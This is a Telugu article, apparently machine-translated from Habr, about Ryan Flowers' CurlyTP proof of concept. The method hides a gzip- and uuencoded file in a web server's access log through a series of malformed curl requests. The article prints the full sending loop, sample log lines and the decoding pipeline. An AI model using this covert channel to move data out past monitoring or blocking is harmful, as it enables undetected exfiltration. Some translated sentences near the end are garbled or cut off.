వికీపీడియా నిర్వచనం ప్రకారం, డెడ్ డ్రాప్ అనేది రహస్య ప్రదేశాన్ని ఉపయోగించే వ్యక్తుల మధ్య సమాచారాన్ని లేదా కొన్ని వస్తువులను మార్పిడి చేయడానికి ఉపయోగపడే కుట్ర సాధనం. ప్రజలు ఎప్పుడూ కలవకూడదనే ఆలోచన ఉంది - కానీ వారు ఇప్పటికీ కార్యాచరణ భద్రతను నిర్వహించడానికి సమాచారాన్ని మార్పిడి చేసుకుంటారు.
దాక్కున్న ప్రదేశం దృష్టిని ఆకర్షించకూడదు. అందువల్ల, ఆఫ్లైన్ ప్రపంచంలో వారు తరచుగా వివేకం గల వస్తువులను ఉపయోగిస్తారు: గోడలో వదులుగా ఉండే ఇటుక, లైబ్రరీ పుస్తకం లేదా చెట్టులోని బోలు.
ఇంటర్నెట్లో చాలా ఎన్క్రిప్షన్ మరియు అనామకీకరణ సాధనాలు ఉన్నాయి, అయితే ఈ సాధనాలను ఉపయోగించడం చాలా వాస్తవం దృష్టిని ఆకర్షిస్తుంది. అదనంగా, వారు కార్పొరేట్ లేదా ప్రభుత్వ స్థాయిలో నిరోధించబడవచ్చు. ఏం చేయాలి?
డెవలపర్ ర్యాన్ ఫ్లవర్స్ ఒక ఆసక్తికరమైన ఎంపికను ప్రతిపాదించారు -
ఏదైనా వెబ్ సర్వర్ లాగ్లో దాదాపు ఏదైనా సందేశాన్ని సేవ్ చేయడానికి మిమ్మల్ని అనుమతిస్తుంది. దీన్ని ఎలా ఉపయోగించాలా అని పువ్వులు ఆలోచించాయి.
అతను ఈ ఎంపికను అందిస్తాడు:
- టెక్స్ట్ ఫైల్ (రహస్య సందేశం) తీసుకుని, హాష్ (md5sum)ని లెక్కించండి.
- మేము దానిని ఎన్కోడ్ చేస్తాము (gzip+uuencode).
- మేము సర్వర్కు ఉద్దేశపూర్వకంగా తప్పు అభ్యర్థనను ఉపయోగించి లాగ్కు వ్రాస్తాము.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh
ఫైల్ను చదవడానికి, మీరు ఈ కార్యకలాపాలను రివర్స్ ఆర్డర్లో నిర్వహించాలి: ఫైల్ను డీకోడ్ చేసి అన్జిప్ చేయండి, హాష్ను తనిఖీ చేయండి (హాష్ ఓపెన్ ఛానెల్ల ద్వారా సురక్షితంగా ప్రసారం చేయబడుతుంది).
ఖాళీలు భర్తీ చేయబడతాయి =+=
తద్వారా చిరునామాలో ఖాళీలు ఉండవు. రచయిత CurlyTP అని పిలిచే ప్రోగ్రామ్, ఇమెయిల్ జోడింపుల వంటి బేస్64 ఎన్కోడింగ్ని ఉపయోగిస్తుంది. అభ్యర్థన కీవర్డ్తో చేయబడుతుంది ?transfer?
తద్వారా గ్రహీత దానిని లాగ్లలో సులభంగా కనుగొనవచ్చు.
ఈ సందర్భంలో లాగ్లలో మనం ఏమి చూస్తాము?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
ఇప్పటికే చెప్పినట్లుగా, రహస్య సందేశాన్ని స్వీకరించడానికి మీరు రివర్స్ క్రమంలో కార్యకలాపాలను నిర్వహించాలి:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g
ప్రక్రియ స్వయంచాలకంగా సులభం. Md5sum సరిపోలుతుంది మరియు ఫైల్ యొక్క కంటెంట్లు ప్రతిదీ సరిగ్గా డీకోడ్ చేయబడిందని నిర్ధారిస్తాయి.
పద్ధతి చాలా సులభం. “ఈ వ్యాయామం యొక్క ఉద్దేశ్యం అమాయక చిన్న వెబ్ అభ్యర్థనల ద్వారా ఫైల్లను బదిలీ చేయవచ్చని నిరూపించడం మరియు ఇది సాదా వచన లాగ్లతో ఏదైనా వెబ్ సర్వర్లో పని చేస్తుంది. ముఖ్యంగా, ప్రతి వెబ్ సర్వర్ ఒక దాక్కున్న ప్రదేశం!" అని ఫ్లవర్స్ రాశారు.
వాస్తవానికి, గ్రహీత సర్వర్ లాగ్లకు ప్రాప్యత కలిగి ఉంటే మాత్రమే పద్ధతి పని చేస్తుంది. కానీ అలాంటి యాక్సెస్ అందించబడుతుంది, ఉదాహరణకు, చాలా మంది హోస్టర్లు.
దీన్ని ఎలా వాడాలి?
ర్యాన్ ఫ్లవర్స్ అతను సమాచార భద్రతా నిపుణుడు కాదని మరియు CurlyTP కోసం సాధ్యమయ్యే ఉపయోగాల జాబితాను కంపైల్ చేయనని చెప్పారు. అతనికి, మనం ప్రతిరోజూ చూసే సుపరిచితమైన సాధనాలను అసాధారణ రీతిలో ఉపయోగించవచ్చనే భావనకు ఇది ఒక రుజువు మాత్రమే.
వాస్తవానికి, ఈ పద్ధతి ఇతర సర్వర్ "దాచడం" వంటి వాటి కంటే అనేక ప్రయోజనాలను కలిగి ఉంది
సర్వీస్ ఫైల్స్ ద్వారా సందేశాలను ప్రసారం చేసే మార్గాలలో ఇది ఒకటి. కొన్ని అధునాతన కంపెనీలు ఎలా ఉంచాలో మీరు గుర్తుంచుకోగలరు
ఒక సాధారణ వ్యక్తి హెడర్లు లేదా HTML కోడ్ని చూడరు కాబట్టి వెబ్ డెవలపర్లు మాత్రమే ఈ ఈస్టర్ ఎగ్ని చూస్తారనే ఆలోచన ఉంది.
మూలం: www.habr.com